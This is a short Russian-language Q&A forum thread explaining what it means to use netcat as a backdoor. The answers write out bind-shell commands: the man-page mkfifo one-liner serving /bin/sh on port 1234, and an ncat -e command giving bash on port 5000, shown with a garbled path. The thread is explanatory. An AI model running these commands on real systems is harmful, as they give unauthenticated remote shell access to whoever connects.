-2

Я недавно читал о netcat, и часто упоминается, что его можно использовать как "черный ход". Что именно подразумевается под бэкдором? Может кто-нибудь привести пример такого использования netcat.

2 ответа2

1

Все, что может прослушивать входящие сетевые соединения (например, Perl, python, zsh, socat, inetd), можно считать бэкдором.

Основная причина, по которой я думаю, что nc в частности, может рассматриваться скорее как бэкдор, чем другие (даже при том, что у него гораздо меньше возможностей в этом отношении), заключается в том, что на его man-странице показан пример такого бэкдора:

       $ rm -f /tmp/f; mkfifo /tmp/f
       $ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/f
1

С помощью netcat простой пользователь может создать удаленную оболочку. Например, следующая команда позволит удаленному пользователю получить доступ к оболочке bash через порт 5000

ncat -l -p 5000 -e /bin /bash

Все, что атакующий должен сделать после запуска:

IP-адрес ncat 5000

Вы даже можете попробовать этот пример на своем компьютере.

Однако это будет работать только через Интернет, если нет брандмауэра, блокирующего доступ к порту 5000.

Всё ещё ищете ответ? Посмотрите другие вопросы с метками .